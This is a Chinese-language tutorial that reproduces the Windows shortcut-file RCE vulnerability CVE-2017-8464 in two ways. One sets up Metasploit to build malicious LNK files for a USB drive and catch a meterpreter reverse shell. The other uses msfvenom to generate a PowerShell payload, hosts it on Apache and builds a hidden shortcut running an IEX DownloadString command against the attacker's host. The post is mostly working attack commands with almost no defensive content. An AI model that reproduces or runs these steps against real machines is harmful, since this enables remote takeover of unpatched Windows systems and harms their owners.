【漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)
早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NSA就承認利用過相似漏洞且以“Olympic Game”為代號研發震網病毒,來阻止伊朗發展核武。
受影響版本
Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server2012 R2 Windows Server 2016
實戰Metasploit成功利用
環境:
kali Linux:192.168.149.129
win7 SP1 一臺
下載利用工具:https://github.com/rapid7/metasploit-framework/archive/master.zip
下載完成後將壓縮包內modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb復制到目錄/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。
2.僅復制rb文件會出錯,須再將壓縮包內data/exploits中的cve-2017-8464文件夾復制到/usr/share/metasploit-framework/data/exploits中。
安裝完後打開終端
msfconsole use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [你的IP地址] exploit
之後會在/root/.msf4/local目錄下生成我們的利用文件
註意:kali2.0下無法直接訪問該文件夾,可通過命令行將/root/.msf4/local/下的所有文件復制到/root/1下
cp -r /root/.msf4/local/ /root/1
全部復制到移動磁盤中去
然後在msf監聽
use multi/handler set paylaod windows/meterpreter/reverse_tcp set LHOST [你的IP地址] run
然後在目標機上打開移動磁盤
成功接受到返回的shell
利用Powershell提權
首先還是利用msf生成一個ps1文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.149.129 -f psh-reflection>/opt/search.ps1
然後將/opt/目錄下的search.ps1文件移動到/var/www/html/下
隨後打開Apache服務
service apache2 start
訪問web下的sp1文件
然後在目標機上建立一個快捷方式
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.149.129/search.ps1‘);test.ps1"
這裏寫我們構造好的代碼
然後選中powershell.exe
再到本機上配置監聽
運行ps1快捷文件
作者:神風
參考文章:
“震網三代”(CVE-2017-8464)的幾種利用方法與防範:http://www.freebuf.com/news/143356.html
【漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)